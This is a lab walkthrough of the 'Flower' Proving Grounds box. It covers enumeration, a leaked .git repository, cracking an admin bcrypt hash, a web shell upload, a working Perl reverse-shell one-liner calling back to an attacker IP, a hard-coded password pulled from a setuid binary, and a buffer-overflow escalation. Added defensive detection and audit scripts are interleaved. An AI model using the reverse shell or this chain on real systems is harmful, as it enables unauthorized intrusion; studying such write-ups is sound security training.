Flower pg walkthrough(Hard)

UWI Lv3

Preface: I hadn't done any boxes for a long while after getting my OSCP, so today was a good chance to warm up.

nmap scan results

nmap -p- -sS -T4 -A 192.168.204.213    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-30 23:15 EDT
Nmap scan report for 192.168.204.213
Host is up (0.077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to flower.pg!
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/30%OT=22%CT=1%CU=40540%PV=Y%DS=4%DC=T%G=Y%TM=68B3
OS:BECD%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10F%TI=Z%CI=Z%TS=A)SEQ(S
OS:P=107%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=107%GCD=2%ISR=10F%TI=Z%CI
OS:=Z%II=I%TS=A)OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578ST
OS:11NW7%O5=M578ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=
OS:FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T
OS:=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 87.18 ms 192.168.45.1
2 87.13 ms 192.168.45.254
3 63.93 ms 192.168.251.1
4 64.76 ms 192.168.204.213

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 109.90 seconds

Directory scanning turned up no paths.

[screenshot]

Then I scanned the UDP ports; nothing was open.

[screenshot]

Subdomain brute-forcing

[screenshot]

Visiting it

[screenshot]

I searched around online for exploits and found that they all require login, so let's see how to get the password.

Scanning revealed a leaked .git directory.
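From the defender's side, a .git dump leaves an obvious trail in the access log: a burst of requests for /.git/HEAD, /.git/config and /.git/objects/... from one client. As an added example (not part of the original post), here is a small detector run over a few constructed Apache combined-format log lines; the addresses, timestamps, paths and user agents are all made up:

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache "combined" log format (made up for this example).
SAMPLE_LOG = """\
192.0.2.10 - - [31/Aug/2025:12:00:01 +0000] "GET / HTTP/1.1" 200 2316 "-" "Mozilla/5.0"
192.0.2.10 - - [31/Aug/2025:12:00:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "git-dumper/1.0"
192.0.2.10 - - [31/Aug/2025:12:00:02 +0000] "GET /.git/config HTTP/1.1" 200 137 "-" "git-dumper/1.0"
192.0.2.10 - - [31/Aug/2025:12:00:03 +0000] "GET /.git/objects/9f/ab HTTP/1.1" 200 400 "-" "git-dumper/1.0"
198.51.100.7 - - [31/Aug/2025:12:01:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Aug/2025:12:01:05 +0000] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD path PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# VCS metadata directories and other dev leftovers that must never be served.
LEAK_RE = re.compile(r'(^|/)\.(git|svn|hg)(/|$)|(^|/)\.env$')

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_vcs_probes(log_text):
    """Return {ip: [(path, status), ...]} for every request that touched VCS/dev files."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and LEAK_RE.search(rec["path"]):
            hits[rec["ip"]].append((rec["path"], int(rec["status"])))
    return dict(hits)

def served_leaks(hits):
    """Keep only clients that actually got a 200 back: those are confirmed leaks, not just probes."""
    return {
        ip: [path for path, status in reqs if status == 200]
        for ip, reqs in hits.items()
        if any(status == 200 for _, status in reqs)
    }

if __name__ == "__main__":
    hits = find_vcs_probes(SAMPLE_LOG)
    for ip, reqs in hits.items():
        print(ip, reqs)
    print("served:", served_leaks(hits))
```

The real fix is not to deploy repository metadata at all and to have the web server refuse anything under .git; the detector is there to tell you whether someone already pulled it before the fix went in. A 404 on /.env is just a probe; the 200 responses on /.git/ are the lines that matter.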

[screenshot]

After restoring the repository, look at config.php

[screenshot]

'admin' => '$2y$10$9fI7vPVLpbDeBsA9yRhPEeGEVgQ/UuSg9RWMZk0mE2Geri8ZahuQK'

Cracking the hash

john hash --wordlist=/root/Desktop/fuzz/rockyou.txt/rockyou.txt
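To make clear what john is actually working against here: the value from config.php is a bcrypt string in modular-crypt format, and its fields say how expensive each guess is. The following is an added example (not from the original post) that parses that exact hash and also gives a rough classification of other storage formats one tends to find in a leaked config; the classification rules are my own simplification:

```python
import re

# Hash quoted from the writeup's config.php; john recovers the plaintext from rockyou.
ADMIN_HASH = "$2y$10$9fI7vPVLpbDeBsA9yRhPEeGEVgQ/UuSg9RWMZk0mE2Geri8ZahuQK"

# bcrypt layout: $<version>$<cost>$<22-char salt><31-char digest>, salt and digest
# both in bcrypt's own base64 alphabet (./A-Za-z0-9). "$2y$" is the prefix PHP emits.
BCRYPT_RE = re.compile(
    r"^\$(?P<version>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

def parse_bcrypt(h):
    """Split a bcrypt string into its fields and work out the cost it implies."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash")
    d = m.groupdict()
    d["cost"] = int(d["cost"])
    d["rounds"] = 2 ** d["cost"]  # the expensive key-setup loop runs 2^cost times per guess
    return d

def classify(stored):
    """Rough identification of how a stored password string was produced.
    Anything that is not a salted, adaptive scheme deserves a finding on its own."""
    if BCRYPT_RE.match(stored):
        return "bcrypt"
    if stored.startswith("$argon2"):
        return "argon2"
    if stored.startswith("$6$"):
        return "sha512crypt"
    if re.fullmatch(r"[0-9a-f]{32}", stored):
        return "md5-unsalted"
    if re.fullmatch(r"[0-9a-f]{40}", stored):
        return "sha1-unsalted"
    return "unknown"

if __name__ == "__main__":
    info = parse_bcrypt(ADMIN_HASH)
    print(f"{classify(ADMIN_HASH)} version={info['version']} cost={info['cost']} "
          f"rounds={info['rounds']} salt={info['salt']}")
```

Cost 10 is the default PHP's password_hash uses, so the storage format itself was fine; the problem is that a cost factor only multiplies the price of each guess, and a password that sits in rockyou needs very few guesses. The defensive lessons are the two the box already makes: keep the repository (and config.php) off the web root, and give the admin account a password that is not in a wordlist.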

[screenshot]

Once inside, upload a PHP web shell directly.

[screenshot]

Then run the reverse shell command to get a shell.

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.174:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

[screenshot]

After uploading and running linpeas.sh, I found a rather interesting file.

[screenshot]

-rwsr-xr-- 1 root dev 14472 May  7  2022 /usr/local/bin/db-backup
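Spotting a file like this is also a routine defensive audit: a setuid-root binary outside the package-managed paths, runnable only by one group, is exactly the kind of custom helper that tends to carry hard-coded credentials or hand-rolled argument handling. The following is an added example, not from the original post: it parses ls -l lines (the first sample line is the one from the writeup, the rest are constructed) and flags the entries worth a look. KNOWN_SETUID is my own short allowlist, not an authoritative one:

```python
import re

# Constructed `ls -l` sample; the first line is the one linpeas reported in the writeup,
# the others are made up to show what the audit ignores and what it flags.
SAMPLE_LS = """\
-rwsr-xr-- 1 root dev 14472 May  7  2022 /usr/local/bin/db-backup
-rwsr-xr-x 1 root root 68208 Feb  6  2024 /usr/bin/passwd
-rwxr-xr-x 1 root root 35000 Jan  1  2024 /usr/local/bin/helper
-rwsr-xr-x 1 root root 12000 Jan  1  2024 /opt/tools/runme
-rwxr-sr-x 1 root shadow 40000 Jan  1  2024 /usr/local/sbin/chk
"""

# mode, link count, owner, group, size, month, day, year-or-time, path
LS_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+\S+\s+\d+\s+\S+\s+(?P<path>\S+)$"
)

# Setuid programs a stock Debian/Ubuntu install is expected to have (my own short
# allowlist, not an authoritative one); any other setuid/setgid file gets reported.
KNOWN_SETUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/mount", "/usr/bin/umount",
}

# Paths the package manager normally owns; /usr/local and /opt are where hand-built tools land.
PACKAGED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/")

def parse_ls(line):
    m = LS_RE.match(line)
    return m.groupdict() if m else None

def is_setuid(mode):
    return mode[3] in "sS"  # 's' = setuid plus owner exec, 'S' = setuid without the exec bit

def is_setgid(mode):
    return mode[6] in "sS"

def audit(ls_text):
    """Return [(path, [reasons])] for setuid/setgid files that are not on the allowlist."""
    findings = []
    for line in ls_text.splitlines():
        rec = parse_ls(line)
        if not rec or not (is_setuid(rec["mode"]) or is_setgid(rec["mode"])):
            continue
        if rec["path"] in KNOWN_SETUID:
            continue
        reasons = []
        if is_setuid(rec["mode"]) and rec["owner"] == "root":
            reasons.append("setuid root")
        if is_setgid(rec["mode"]):
            reasons.append(f"setgid {rec['group']}")
        if not rec["path"].startswith(PACKAGED_PREFIXES):
            reasons.append("outside package-managed paths")
        if rec["mode"][9] == "-" and rec["mode"][6] in "xs":
            # only one group may run it: somebody built this for a specific team
            reasons.append(f"executable only by group {rec['group']}")
        findings.append((rec["path"], reasons))
    return findings

if __name__ == "__main__":
    for path, reasons in audit(SAMPLE_LS):
        print(path, "->", "; ".join(reasons))
```

On a real host, feed it the output of `find / -perm /6000 -type f -exec ls -l {} +` and replace the prefix test with `dpkg -S` (or `rpm -qf`) so a package is actually confirmed to own each file; the db-backup line above would be flagged on all three counts.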

Download it to the local Kali box, then

cat db-backup | strings

[screenshot]

Looking closely, we can make out a password inside.

svc-dev2019P4SSw0Rd
lucienne

Trying to log in directly with this password succeeded.

[screenshot]

Successfully read local.txt.

Next comes privilege escalation. I honestly could not see where the escalation point was; later I checked a writeup, which said it was a buffer overflow.

First create a malicious file

[screenshot]

Then

[screenshot]

You can see the buffer overflow being triggered.

Privilege escalation succeeded.

[screenshot]

  • Title: Flower pg walkthrough(Hard)
  • Author: UWI
  • Created at : 2025-08-31 11:12:54
  • Updated at : 2025-08-31 17:31:51
  • Link: https://nbwsws.github.io/2025/08/31/打靶/Flower/
  • License: This work is licensed under CC BY-NC-SA 4.0.